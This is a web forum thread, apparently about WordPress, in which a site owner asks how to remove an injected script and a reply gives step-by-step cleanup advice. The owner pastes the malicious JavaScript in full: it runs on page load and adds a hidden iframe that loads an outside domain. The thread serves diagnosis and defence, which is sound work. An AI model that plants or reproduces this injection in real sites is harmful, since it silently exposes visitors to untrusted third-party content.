I browsed my site and noticed scrolling that wasn't there before.
After inspecting I noticed there's an invisible iFrame.
After seeing the iframe in the source page I looked through all my site files and couldn't find the same line of code that was in the source.
I ran my site to look for malware but all is clean. I did have a warning from Google a few months ago but my host removed the malicious files and Google approved the clean up and still does. But now I'm seeing this invisible object with an url.
Source script:
<script language="JavaScript">
if(document.loaded) {
showBrowVer();
} else {
if (window.addEventListener) {
window.addEventListener('load', showBrowVer, false);
} else {
window.attachEvent('onload', showBrowVer);
}
}
function showBrowVer() {
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://24corp-shop.com';
js_kod2.width = '250px';
js_kod2.height = '320px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
</script>
I see it is being brought in by wp_head();
but I looked through it and didn't see anything suspicious.
Does anyone have tips on looking for this injection to manually remove it from my WP site?
wp_head() itself is not being used at this case for spreading the "malign" code that is in your site. That code is elsewhere not on wp_head().
1 - Make a full backup of your current site (database + files) 2 - Deactivate all plugins and see if the malign code still exists. 2 - if the malign code still exists then check your themes folder.on your default theme go to functions.php and search through that file for that code, or base64 encrypted code, eval, includes, etc. 3 - if the malign code, does not exist, after you have deactivated all your plugins then this means that the malign code is on one of those plugins.
Use divide & conquer method to find firstly in which plugin is installed the malign code and after that identify the file that has the malign code.